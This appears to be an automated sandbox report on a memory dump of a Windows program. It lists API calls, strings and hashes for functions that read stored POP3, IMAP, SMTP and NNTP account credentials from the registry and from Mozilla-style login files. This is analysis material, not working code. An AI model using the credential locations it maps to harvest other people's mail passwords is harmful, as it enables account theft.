NNTP_Server, xrefs: 00443208
IMAP_Port, xrefs: 00443490
IMAP_User_Name, xrefs: 0044328D
SMTP_User_Name, xrefs: 004432F3
NNTP_Email_Address, xrefs: 004433E6
SMTP, xrefs: 004433B6
POP3_User_Name, xrefs: 0044325A
POP3_Port, xrefs: 004434A1
IMAP_Secure_Connection, xrefs: 00443504
Account_Name, xrefs: 0044316A
SMTP_Secure_Connection, xrefs: 004434CA
POP3_Server, xrefs: 004431B0
SMTP_Server, xrefs: 00443231
SMTP_Email_Address, xrefs: 0044340F
NNTP_User_Name, xrefs: 004432C0
NNTP_Secure_Connection, xrefs: 004434F3
NNTP_Port, xrefs: 0044347F
NNTP, xrefs: 00443386
POP3, xrefs: 00443326
POP3_Secure_Connection, xrefs: 00443515

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: strcmp$_strcmpi$memcpystrlenstrtoul
String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
API String ID: 1714764973-479759155
Opcode ID: 3e744774e1b54c5518bf8e5aac84703aef8afe28786d84d16e7c652b93ffe923
Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
Opcode Fuzzy Hash: 3e744774e1b54c5518bf8e5aac84703aef8afe28786d84d16e7c652b93ffe923
Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E417, Relevance: 68.7, APIs: 25, Strings: 14, Instructions: 449COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E6BB

Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949

memset.MSVCRT ref: 0040E70C
memset.MSVCRT ref: 0040E728
MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
memset.MSVCRT ref: 0040E7C0
memset.MSVCRT ref: 0040E7D5
_mbscpy.MSVCRT ref: 0040E83A
_mbscpy.MSVCRT ref: 0040E850
_mbscpy.MSVCRT ref: 0040E866
_mbscpy.MSVCRT ref: 0040E87C
_mbscpy.MSVCRT ref: 0040E892
_mbscpy.MSVCRT ref: 0040E8A8
memset.MSVCRT ref: 0040E8C2

Strings

,, xrefs: 0040E68E
mailbox://%s, xrefs: 0040E98B
:, xrefs: 0040E692
imap://%s, xrefs: 0040E9A0
", xrefs: 0040E69A
, xrefs: 0040E69E
/, xrefs: 0040E68A
+, xrefs: 0040E6A2
%@, xrefs: 0040E73A
$, xrefs: 0040E6A6
e, xrefs: 0040E686
8, xrefs: 0040E6AE
$, xrefs: 0040E6AA
smtp://%s, xrefs: 0040E9B5

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_mbscpy$ByteCharMultiWidestrlen
String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
API String ID: 3137614212-1813914204
Opcode ID: 90435b619fbbbc51a3d17079f0c7549d0f84e3f4b297510e384a0a4db02359a1
Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
Opcode Fuzzy Hash: 90435b619fbbbc51a3d17079f0c7549d0f84e3f4b297510e384a0a4db02359a1
Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA89, Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DAAE
strlen.MSVCRT ref: 0040DAB9
_strncoll.MSVCRT ref: 0040DAC6
_strcmpi.MSVCRT ref: 0040DB03
_strcmpi.MSVCRT ref: 0040DB25
strlen.MSVCRT ref: 0040DB45
_strncoll.MSVCRT ref: 0040DB52
_strcmpi.MSVCRT ref: 0040DB9B
_strcmpi.MSVCRT ref: 0040DBBD
_strcmpi.MSVCRT ref: 0040DBDF
_strcmpi.MSVCRT ref: 0040DC01
atoi.MSVCRT ref: 0040DC0F

Part of subcall function 0040DA02: memset.MSVCRT ref: 0040DA38
Part of subcall function 0040DA02: memcpy.MSVCRT ref: 0040DA5A
Part of subcall function 0040DA02: atoi.MSVCRT ref: 0040DA6E

_strcmpi.MSVCRT ref: 0040DC23
_strcmpi.MSVCRT ref: 0040DC36
strlen.MSVCRT ref: 0040DC51
_strncoll.MSVCRT ref: 0040DC5E
_strcmpi.MSVCRT ref: 0040DCA3
_strcmpi.MSVCRT ref: 0040DCC5
_strcmpi.MSVCRT ref: 0040DCE4
strlen.MSVCRT ref: 0040DCFF
strlen.MSVCRT ref: 0040DD09

Strings

server, xrefs: 0040DAF9
mail.server, xrefs: 0040DB3F, 0040DB44, 0040DB4D
port, xrefs: 0040DBF9
identities, xrefs: 0040DB1D
signon.signonfilename, xrefs: 0040DCDC
mail.identity, xrefs: 0040DC4B, 0040DC50, 0040DC59
useSecAuth, xrefs: 0040DC1B
true, xrefs: 0040DC2E
hostname, xrefs: 0040DBD7
type, xrefs: 0040DBB5
mail.account.account, xrefs: 0040DAB3, 0040DAB8, 0040DAC1
useremail, xrefs: 0040DC99
fullname, xrefs: 0040DCBD
username, xrefs: 0040DB91

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
API String ID: 594115653-593045482
Opcode ID: d389e3c4320d959ad948487e3872a8637bfc9f18e20058ce9d17245a94e7a976
Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
Opcode Fuzzy Hash: d389e3c4320d959ad948487e3872a8637bfc9f18e20058ce9d17245a94e7a976
Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E070, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 279COMMON

Download Yara Rule

APIs

Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949

Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D

Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D

memset.MSVCRT ref: 0040E123
memset.MSVCRT ref: 0040E138
_mbscpy.MSVCRT ref: 0040E19F
_mbscpy.MSVCRT ref: 0040E1B5
_mbscpy.MSVCRT ref: 0040E1CB
_mbscpy.MSVCRT ref: 0040E1E1
_mbscpy.MSVCRT ref: 0040E1F7
_mbscpy.MSVCRT ref: 0040E20A
memset.MSVCRT ref: 0040E225
memset.MSVCRT ref: 0040E23C

Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD

memset.MSVCRT ref: 0040E29D
memset.MSVCRT ref: 0040E2B4
memset.MSVCRT ref: 0040E2CB
sprintf.MSVCRT ref: 0040E2E6
sprintf.MSVCRT ref: 0040E2FB
sprintf.MSVCRT ref: 0040E310
_strcmpi.MSVCRT ref: 0040E326
_strcmpi.MSVCRT ref: 0040E33F
_strcmpi.MSVCRT ref: 0040E358
_strcmpi.MSVCRT ref: 0040E374

Strings

passwordField, xrefs: 0040E174
C@, xrefs: 0040E0A9
mailbox://%s, xrefs: 0040E2E0
logins, xrefs: 0040E0BD
encryptedUsername, xrefs: 0040E14D
imap://%s, xrefs: 0040E2F5
httpRealm, xrefs: 0040E181
hostname, xrefs: 0040E140
usernameField, xrefs: 0040E167
smtp://%s, xrefs: 0040E30A
encryptedPassword, xrefs: 0040E15A

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
API String ID: 4171719235-3249434271
Opcode ID: 12cb96f401a341e246283030d7facd02342688c056a454bfd348006343061e1f
Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
Opcode Fuzzy Hash: 12cb96f401a341e246283030d7facd02342688c056a454bfd348006343061e1f
Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD76, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
GetWindowRect.USER32(00000000,?), ref: 0040FDF1
GetWindowRect.USER32(?,?), ref: 0040FDFC
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
GetDC.USER32 ref: 0040FE57
strlen.MSVCRT ref: 0040FE97
GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
ReleaseDC.USER32(?,?), ref: 0040FEF5
sprintf.MSVCRT ref: 0040FFB5
SetWindowTextA.USER32(?,?), ref: 0040FFC9
SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
GetDlgItem.USER32(?,00000001), ref: 0041001D
GetWindowRect.USER32(00000000,?), ref: 0041002D
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
GetClientRect.USER32(?,?), ref: 00410052
GetWindowRect.USER32(?,?), ref: 0041005C
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
GetClientRect.USER32(?,?), ref: 004100AC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4

Strings

EDIT, xrefs: 0040FF90
STATIC, xrefs: 0040FF59
%s:, xrefs: 0040FFAF

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
String ID: %s:$EDIT$STATIC
API String ID: 1703216249-3046471546
Opcode ID: be54f816406a202d5615b3af9ad2dfe990fb4b07b3e5f264db4d901fa9d3bfd2
Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
Opcode Fuzzy Hash: be54f816406a202d5615b3af9ad2dfe990fb4b07b3e5f264db4d901fa9d3bfd2
Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0040243C, Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004024E7

Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,004107E3,?,?,?,?,004107E3,00000000,?,?), ref: 0041046D

_mbscpy.MSVCRT ref: 00402525
_mbscpy.MSVCRT ref: 004025EF

Strings

IMAP, xrefs: 00402489
POP3 Secure Connection, xrefs: 004024BA
HTTPMail Server, xrefs: 00402474
IMAP Port, xrefs: 004024A5
SMTP Display Name, xrefs: 0040255A
SMTP Email Address, xrefs: 0040256F
SMTP, xrefs: 00402497
SMTP Server, xrefs: 0040247B, 0040258C
POP3 User Name, xrefs: 0040244A
HTTPMail, xrefs: 00402490
HTTPMail Port, xrefs: 004024AC
IMAP User Name, xrefs: 00402451
HTTPMail User Name, xrefs: 00402458
HTTPMail Secure Connection, xrefs: 004024C8
POP3 Port, xrefs: 0040249E
POP3 Server, xrefs: 00402466
SMTP Port, xrefs: 004024B3
Password2, xrefs: 004025C5
IMAP Secure Connection, xrefs: 004024C1
SMTP USer Name, xrefs: 0040245F
IMAP Server, xrefs: 0040246D
POP3, xrefs: 00402482
SMTP Secure Connection, xrefs: 004024CF

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$QueryValuememset
String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
API String ID: 168965057-606283353
Opcode ID: 5dbff6597920aada75ae8aaeb86cab491c9827adffffbf44ad9357716d36e750
Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
Opcode Fuzzy Hash: 5dbff6597920aada75ae8aaeb86cab491c9827adffffbf44ad9357716d36e750
Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004027B0, Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040285B

Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5

_mbscpy.MSVCRT ref: 00402895

Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3

_mbscpy.MSVCRT ref: 0040296D

Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A

Strings

IMAP, xrefs: 004027C5
POP3 User, xrefs: 004027F6
IMAP Port, xrefs: 00402819
HTTP, xrefs: 004027CC
Password, xrefs: 00402944
POP3 Use SPA, xrefs: 0040282E
SMTP, xrefs: 004027D3
SMTP User, xrefs: 0040280B
Email, xrefs: 004028D9
HTTPMail Use SSL, xrefs: 0040283C
SMTP Server, xrefs: 004027EF, 004028F1
IMAP User, xrefs: 004027FD
HTTP Port, xrefs: 00402820
POP3 Port, xrefs: 00402812
SMTP Use SSL, xrefs: 00402843
POP3 Server, xrefs: 004027DA
SMTP Port, xrefs: 00402827, 00402908
Display Name, xrefs: 004028C6
HTTP Server URL, xrefs: 004027E8
HTTP User, xrefs: 00402804
IMAP Server, xrefs: 004027E1
IMAP Use SPA, xrefs: 00402835
POP3, xrefs: 004027BE

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValue_mbscpy$ByteCharMultiWidememset
String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
API String ID: 1497257669-167382505
Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5B8, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 0040F600
GetDlgItem.USER32(?,000003EA), ref: 0040F618
SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
memset.MSVCRT ref: 0040F675
memset.MSVCRT ref: 0040F695
memset.MSVCRT ref: 0040F6B3
memset.MSVCRT ref: 0040F6CC
memset.MSVCRT ref: 0040F6EA
memset.MSVCRT ref: 0040F703
GetCurrentProcess.KERNEL32 ref: 0040F70B
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
memset.MSVCRT ref: 0040F7BD
GetCurrentProcessId.KERNEL32 ref: 0040F7CB
memcpy.MSVCRT ref: 0040F7FA
_mbscpy.MSVCRT ref: 0040F81C
sprintf.MSVCRT ref: 0040F887
SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
SetFocus.USER32(00000000), ref: 0040F8B1

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
{Unknown}, xrefs: 0040F67A

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
API String ID: 1428123949-3474136107
Opcode ID: 7da0019b15a70a8ecc86a35ddbb970a570ad0084860970d5c569cc259bcc4bb3
Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
Opcode Fuzzy Hash: 7da0019b15a70a8ecc86a35ddbb970a570ad0084860970d5c569cc259bcc4bb3
Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401060, Relevance: 39.2, APIs: 26, Instructions: 186COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003EC), ref: 004010BC
ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
GetDlgItem.USER32(?,000003EE), ref: 00401103
ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
GetDlgItem.USER32(?,000003EC), ref: 0040113E
ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
LoadCursorA.USER32(00000067), ref: 0040115F
SetCursor.USER32(00000000,?,?), ref: 00401166
GetDlgItem.USER32(?,000003EE), ref: 00401186
ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
GetDlgItem.USER32(?,000003EC), ref: 004011AD
SetBkMode.GDI32(?,00000001), ref: 004011B9
SetTextColor.GDI32(?,00C00000), ref: 004011C7
GetSysColorBrush.USER32(0000000F), ref: 004011CF
GetDlgItem.USER32(?,000003EE), ref: 004011EF
EndDialog.USER32(?,00000001), ref: 0040121A
DeleteObject.GDI32(?), ref: 00401226
GetDlgItem.USER32(?,000003ED), ref: 0040124A
ShowWindow.USER32(00000000), ref: 00401253
GetDlgItem.USER32(?,000003EE), ref: 0040125F
ShowWindow.USER32(00000000), ref: 00401262
SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
memset.MSVCRT ref: 0040128E
SetWindowTextA.USER32(?,00000000), ref: 004012AA
SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
String ID:
API String ID: 2998058495-0
Opcode ID: d0c79ddb5cdb04a56f06c9713ba923215785d9fa425cc291896e6cba069ff765
Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
Opcode Fuzzy Hash: d0c79ddb5cdb04a56f06c9713ba923215785d9fa425cc291896e6cba069ff765
Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B94B, Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C

SetMenu.USER32(?,00000000), ref: 0040BA7E
SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
LoadIconA.USER32(00000066,00000000), ref: 0040BB96
_strcmpi.MSVCRT ref: 0040BBEE
RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
SetFocus.USER32(?,00000000), ref: 0040BC29
GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
strlen.MSVCRT ref: 0040BC59
strlen.MSVCRT ref: 0040BC67
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3

Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3

SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
memset.MSVCRT ref: 0040BD36
SetWindowTextA.USER32(?,?), ref: 0040BD5A

Strings

/noloadsettings, xrefs: 0040BBE8
commdlg_FindReplace, xrefs: 0040BCBE
report.html, xrefs: 0040BC60, 0040BC78
SysListView32, xrefs: 0040BB21

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
API String ID: 2303586283-933021314
Opcode ID: 2cd3750268afcf2c00fdbb78acb8169defb1c0a4abc17376fcb8bc6945515cda
Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
Opcode Fuzzy Hash: 2cd3750268afcf2c00fdbb78acb8169defb1c0a4abc17376fcb8bc6945515cda
Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004109F8, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410A19
memset.MSVCRT ref: 00410A2D
_mbscpy.MSVCRT ref: 00410A5A
sprintf.MSVCRT ref: 00410A75
_mbscat.MSVCRT ref: 00410A82
sprintf.MSVCRT ref: 00410AAC
_mbscat.MSVCRT ref: 00410AB9
_mbscat.MSVCRT ref: 00410AC7
_mbscat.MSVCRT ref: 00410AD9
_mbscat.MSVCRT ref: 00410AE4
_mbscat.MSVCRT ref: 00410AF6
_mbscat.MSVCRT ref: 00410B08

Strings

</b>, xrefs: 00410AF0
color="#%s", xrefs: 00410AA6
<font, xrefs: 00410A54
<b>, xrefs: 00410AD3
</font>, xrefs: 00410B02
size="%d", xrefs: 00410A6F

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscat$memsetsprintf$_mbscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 633282248-1996832678
Opcode ID: d630389c35e97599bcde8a8899de04e430e3a493f8c02fcbb7772580aaf4b9e1
Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
Opcode Fuzzy Hash: d630389c35e97599bcde8a8899de04e430e3a493f8c02fcbb7772580aaf4b9e1
Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00441A6C, Relevance: 30.4, APIs: 7, Strings: 13, Instructions: 375COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00441AB5
memcmp.MSVCRT ref: 00441B43
memcmp.MSVCRT ref: 00441CED
memcmp.MSVCRT ref: 00441D19
memcmp.MSVCRT ref: 00441D4B
memcmp.MSVCRT ref: 00441D96
memcpy.MSVCRT ref: 00441E29

Strings

no such %s mode: %s, xrefs: 00441DB1
invalid uri authority: %.*s, xrefs: 00441B54
file:, xrefs: 00441AAF
@, xrefs: 00441AC5
localhost, xrefs: 00441B3E
vfs, xrefs: 00441CE8
mode, xrefs: 00441D46
vB, xrefs: 00441DDB, 00441D8D
cache, xrefs: 00441D14, 00441D36
no such vfs: %s, xrefs: 00441E54
access, xrefs: 00441D69
%s mode not allowed: %s, xrefs: 00441DF6
vB, xrefs: 00441E67

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$@$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs$vB$vB
API String ID: 231171946-249847709
Opcode ID: 4bd921308c1edc78a033874f30d8fc08f30fcebd0039bece1347af0f2cf480bf
Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
Opcode Fuzzy Hash: 4bd921308c1edc78a033874f30d8fc08f30fcebd0039bece1347af0f2cf480bf
Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6AF, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A6CF
memset.MSVCRT ref: 0040A6F2
memset.MSVCRT ref: 0040A708
